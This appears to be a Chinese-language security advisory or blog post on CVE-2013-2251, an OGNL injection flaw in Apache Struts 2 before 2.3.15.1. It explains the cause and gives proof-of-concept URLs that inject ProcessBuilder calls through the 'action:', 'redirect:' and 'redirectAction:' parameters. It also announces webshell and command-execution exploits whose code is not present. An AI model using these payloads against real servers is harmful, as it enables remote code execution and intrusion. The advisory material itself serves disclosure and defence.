Struts又爆遠(yuǎn)程代碼執(zhí)行漏洞了!在這次的漏洞中，攻擊者可以通過(guò)操縱參數(shù)遠(yuǎn)程執(zhí)行惡意代碼。Struts 2.3.15.1之前的版本，參數(shù)action的值redirect以及redirectAction沒(méi)有正確過(guò)濾，導(dǎo)致ognl代碼執(zhí)行。

描述

影響版本 Struts 2.0.0 - Struts 2.3.15

報(bào)告者 Takeshi Terada of Mitsui Bussan Secure Directions, Inc.

CVE編號(hào) CVE-2013-2251

漏洞證明

參數(shù)會(huì)以O(shè)GNL表達(dá)式執(zhí)行

http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

代碼執(zhí)行

http://host/struts2-blank/example/X.action?action:%25{(new+
java.lang.ProcessBuilder(new+java.lang.String[]
{'command','goes','here'})).start()}

http://host/struts2-showcase/employee/save.action?redirect:%25
{(new+java.lang.ProcessBuilder(new+java.lang.String[]
{'command','goes','here'})).start()}

http://host/struts2-showcase/employee/save.action?redirectAction:%25
{(new+java.lang.ProcessBuilder(new+java.lang.String[]
{'command','goes','here'})).start()}

漏洞原理

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

In Struts 2 before 2.3.15.1 the information following “action:”, “redirect:” or “redirectAction:” is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.

以下僅供教學(xué)研究之用，嚴(yán)禁非法用途!

執(zhí)行任意命令EXP，感謝X提供：

爆網(wǎng)站路徑EXP，感謝h4ck0r提供：

python執(zhí)行任意命令，感謝h4ck0r提供

GETSHELL EXP，感謝coffee提供：

然后用以下代碼寫(xiě)shell:

上前目錄生成1.jsp